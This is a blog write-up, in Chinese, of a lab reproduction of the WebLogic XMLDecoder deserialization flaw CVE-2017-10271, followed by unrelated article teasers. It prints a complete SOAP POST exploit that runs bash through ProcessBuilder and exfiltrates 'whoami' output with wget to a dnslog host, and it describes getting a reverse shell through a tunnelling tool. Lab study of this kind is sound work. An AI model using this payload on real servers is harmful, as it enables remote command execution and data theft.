[CVE-2017-10271]Weblogic--WLS Security反序列化漏洞复现

文章目录

  • 靶机地址
  • 靶机说明
  • 开启并访问靶机
  • POC
  • exp
  • 反弹shell
  • 后续查找flag过程略

靶机地址

网站地址 cyberstrikelab.com
靶机地址CVE-2017-10271

靶机说明

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

在这里插入图片描述

开启并访问靶机

在这里插入图片描述

在这里插入图片描述

POC

在访问地址后面补充 /wls-wsat/CoordinatorPortType 会跳转到如下页面,说明有漏洞
在这里插入图片描述

exp

两个核心:

  • 默认的GET方法修改为POST方法
  • Content-Type: text/xml

另外,靶机没有 curl 不过有 wget ,可通过 wget + dnslog 信息外带

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: xxxxxx.cyberstrikelab.com:83
Content-Type: text/xml
Content-Length: 617<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget `whoami`.xxxxx.dnslog.cn
</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

在这里插入图片描述

反弹shell

一开始反弹shell没有成功,网上查询资料,根据又菜又爱倒腾大佬文章提示,发现部分字符需要转换成实体编码;网上随便找的实体编码在线转换网站 HtmlEncode,反弹过程中使用了 cpolar 的内网穿透工具(免费的),顺利反弹到本地的kali电脑,顺利 getshell

利用在线网站将反弹 shell 的部分字符进行实体编码

在这里插入图片描述

后续查找flag过程略







参考资料以及工具网站:

  1. cyberstrikelab靶机网站 https://www.cyberstrikelab.com/
  2. 又菜又爱倒腾大佬的《Weblogic XMLDecoder反序列化漏洞复现(CVE-2017-10271)》
  3. 反弹shell网站 https://www.revshells.com/
  4. 实体编码在线转换网站 https://www.convertstring.com/zh_CN/EncodeDecode/HtmlEncode
  5. 内网穿透工具 https://www.cpolar.com/
  6. 大表哥哟的 cpolar 使用教程 https://mp.weixin.qq.com/s/-yD7ymzdlegwcLugnL9FZw

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/33023.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

如何在vscode中编译linux中的c++文件

如何在vscode中编译linux中的c++文件

方式一 在终端打开进行连接编译 指令含义&#xff1a;将 muduo_server.cpp 源文件编译成一个可执行文件 server&#xff0c;并且在链接过程中使用 muduo_net、muduo_base 库以及 pthread 库 方式二 在vscode中修改配置文件 按F1打开配置文件搜索栏&#xff0c;输入C/C 打开…
阅读更多...
Unity中刚体撞墙抖动的原因和本质

Unity中刚体撞墙抖动的原因和本质

当我们制作角色移动的时候我们都知道使用设置位置的方法来移动一个带有刚体和碰撞体的物体&#xff0c;遇到碰撞体的时候就会抖动。 上网查找原因&#xff0c;都说是和物理系统冲突导致的&#xff0c;然后再也找不到其他线索。 这个说法&#xff0c;对&#xff0c;但它并不是最…
阅读更多...
文件解析漏洞靶场通关合集

文件解析漏洞靶场通关合集

一、IIS解析漏洞 &#xff08;一&#xff09;iis6的目录解析漏洞(.asp目录中的所有文件都会被当做asp文件执行) 第一步&#xff1a;在网站根目录下创建了一个x.asp文件夹&#xff0c;并在文件夹中创建一个名为1.txt的文本文档 第二步&#xff1a;文本文档中输入<% now()%&…
阅读更多...
【Linux】浅谈冯诺依曼和进程

【Linux】浅谈冯诺依曼和进程

一、冯诺依曼体系结构 冯诺依曼由 输入设备、输出设备、运算器、控制器、存储器 五部分组成。 冯诺依曼的设计特点 二进制表示 所有数据&#xff08;包括程序指令&#xff09;均以二进制形式存储和运算&#xff0c;简化了硬件逻辑设计&#xff0c;提高了可靠性。 存储程序原理…
阅读更多...
技术聚焦:Debezium 如何将数据库数据精准注入 Kafka

技术聚焦:Debezium 如何将数据库数据精准注入 Kafka

#作者&#xff1a;任少近 文章目录 第一章 Debezium抽取mysql数据给kafka原理第二章 Debezium 与kafka抽取方法及验证2.1 debezium2.0kafka3.3.1mysql82.2 debezium2.0kafka2.6.1mysql82.3 debezium2.0kafka2.6.1mysql5.7 第一章 Debezium抽取mysql数据给kafka原理 debezium的…
阅读更多...
SpringBoot学生宿舍管理系统的设计与开发

SpringBoot学生宿舍管理系统的设计与开发

项目概述 幽络源分享的《SpringBoot学生宿舍管理系统的设计与开发》是一款专为校园宿舍管理设计的智能化系统&#xff0c;基于SpringBoot框架开发&#xff0c;功能全面&#xff0c;操作便捷。该系统涵盖管理员、宿管员和学生三大角色&#xff0c;分别提供宿舍管理、学生信息管…
阅读更多...
LLM剪枝代码解释与实现

LLM剪枝代码解释与实现

LLM剪枝代码解释与实现 目录 LLM剪枝代码解释与实现函数概述函数参数函数实现步骤1. 遍历模型的所有参数2. 筛选权重参数3. 计算参数的绝对值4. 计算阈值5. 创建掩码6. 应用掩码7. 返回剪枝后的模型总结可运行代码注意安装包的版本信息 transformers adapter-transformers函数概…
阅读更多...
STM32 HAL库实战:轻松实现串口通信驱动蓝牙模块与ESP8266开发

STM32 HAL库实战:轻松实现串口通信驱动蓝牙模块与ESP8266开发

STM32 HAL库实战&#xff1a;轻松实现串口通信驱动蓝牙模块与ESP8266开发 引言 STM32F103C8T6作为一款性能强劲的32位微控制器&#xff0c;广泛应用于各类嵌入式系统。本文将详细介绍如何使用STM32F103C8T6的HAL库进行串口通信&#xff0c;并展示如何通过串口驱动蓝牙模块&…
阅读更多...
Html5记忆翻牌游戏开发经验分享

Html5记忆翻牌游戏开发经验分享

H5记忆翻牌游戏开发经验分享 这里写目录标题 H5记忆翻牌游戏开发经验分享前言项目概述技术要点解析1. 页面布局&#xff08;HTML CSS&#xff09;响应式设计 2. 翻牌动画效果3. 游戏逻辑实现状态管理卡片配对检测 开发技巧总结1. 模块化设计2. 性能优化3. 用户体验 踩坑经验扩…
阅读更多...
Insar结合ISCE2,某一个文件进行并行-stackSentinel.py

Insar结合ISCE2,某一个文件进行并行-stackSentinel.py

stackSentinel.py 依次执行 run_01 到 run_15&#xff0c;记录各自的日志 并行执行 run_16 里的所有命令&#xff0c;仍然记录日志 不知道对不对&#xff0c;测试的时间有点长就给停了 #!/bin/bash# ✅ 适用于 WSL/Linux runfiles_path"/mnt/e/insar_order_test/Stack…
阅读更多...
入门网络安全工程师要学习哪些内容【2025年寒假最新学习计划】

入门网络安全工程师要学习哪些内容【2025年寒假最新学习计划】

&#x1f91f; 基于入门网络安全/黑客打造的&#xff1a;&#x1f449;黑客&网络安全入门&进阶学习资源包 大家都知道网络安全行业很火&#xff0c;这个行业因为国家政策趋势正在大力发展&#xff0c;大有可为!但很多人对网络安全工程师还是不了解&#xff0c;不知道网…
阅读更多...
LuaJIT 学习(2)—— 使用 FFI 库的几个例子

LuaJIT 学习(2)—— 使用 FFI 库的几个例子

文章目录 介绍Motivating Example: Calling External C Functions例子&#xff1a;Lua 中调用 C 函数 Motivating Example: Using C Data StructuresAccessing Standard System FunctionsAccessing the zlib Compression LibraryDefining Metamethods for a C Type例子&#xf…
阅读更多...
蓝桥杯 3514子串简写

蓝桥杯 3514子串简写

问题描述 程序猿圈子里正在流行一种很新的简写方法&#xff1a;对于一个字符串&#xff0c;只保留首尾字符&#xff0c;将首尾字符之间的所有字符用这部分的长度代替。例如 internation-alization 简写成 i18n&#xff0c;Kubernetes &#xff08;注意连字符不是字符串的一部分…
阅读更多...
完美解决ElementUI中树形结构table勾选问题

完美解决ElementUI中树形结构table勾选问题

完美解决ElementUI中树形结构table勾选问题 实现功能效果图全选取消全选取消父节点取消某个子节点 关键代码 实现功能 1. 全选/取消全选&#xff0c;更新所有节点勾选状态 2. 勾选父/子节点&#xff0c;子/父节点状态和全选框状态更新 效果图 全选 取消全选 取消父节点 取消某…
阅读更多...
来看两篇RAG相关的优化工作:多跳查询的优化L-RAG以及利用记忆增强的查询重构MemQ框架

来看两篇RAG相关的优化工作:多跳查询的优化L-RAG以及利用记忆增强的查询重构MemQ框架

增强多跳文档检索的分层表示方法(Layer-wise Retrieval-Augmented Generation, L-RAG) 分层检索增强生成(L-RAG),旨在优化多跳文档检索,以解决现有检索增强生成(RAG)方法的局限性。标准RAG在处理复杂的多跳查询时表现不佳,并且由于迭代处理引入了显著的计算开销。L-RA…
阅读更多...
Linux网络套接字编程——创建并绑定

Linux网络套接字编程——创建并绑定

目录 网络字节序 socket编程接口 socket bind 如果将进程比作一个房子&#xff0c;那套接字相当于是一扇门&#xff0c;通向与外界通信的通道。 在网络中&#xff0c;如何理解套接字呢&#xff0c;时刻记住套接字是为了标识互联网中的某一台主机上的某一个进程&#xff0c…
阅读更多...
Linux下部署前后端分离项目 —— Linux下安装nginx

Linux下部署前后端分离项目 —— Linux下安装nginx

1 打包前后端项目 1.1 打包Vue项目 # 构建生产环境包 npm run build:prod 注意&#xff1a;我这边使用的命令是 npm run build:pro&#xff0c;一般都是 npm run build:prod&#xff0c;具体看前端package.json文件中是如何配置的&#xff0c;如下&#xff1a; 1.2 后端打包 …
阅读更多...
手绘板工具:基于python以及pyqt5实现的手绘白板

手绘板工具:基于python以及pyqt5实现的手绘白板

基于python实现的手绘板工具 包含&#xff1a;钢笔工具&#xff0c;铅笔工具&#xff0c;橡皮擦&#xff0c;颜色选择&#xff0c;导出为图片。 当然图片临摹也必不可少。 # -*- coding: utf-8 -*- import sys from PyQt5.QtWidgets import (QApplication, QMainWindow, QWi…
阅读更多...
OpenAI智能体初探:使用 OpenAI Responses API 在 PDF 中实现检索增强生成(RAG)

OpenAI智能体初探:使用 OpenAI Responses API 在 PDF 中实现检索增强生成(RAG)

大家好,我是大 F,深耕AI算法十余年,互联网大厂技术岗。 知行合一,不写水文,喜欢可关注,分享AI算法干货、技术心得。 欢迎关注《大模型理论和实战》、《DeepSeek技术解析和实战》,一起探索技术的无限可能! 引子 在信息爆炸的时代,从大量 PDF 文档中快速准确地检索信息…
阅读更多...
DexGraspVLA:面向通用灵巧抓取的视觉-语言-动作框架

DexGraspVLA:面向通用灵巧抓取的视觉-语言-动作框架

25年3月来自北大、北大-灵初智能&#xff08;PsiBot&#xff09;联合实验室、香港科技大学广州分校的论文“DexGraspVLA: A Vision-Language-Action Framework Towards General Dexterous Grasping”。 灵巧抓取仍然是机器人技术中一个基本但具有挑战性的问题。通用机器人必须…
阅读更多...
最新文章
推荐文章

Copyright @ 2022~2023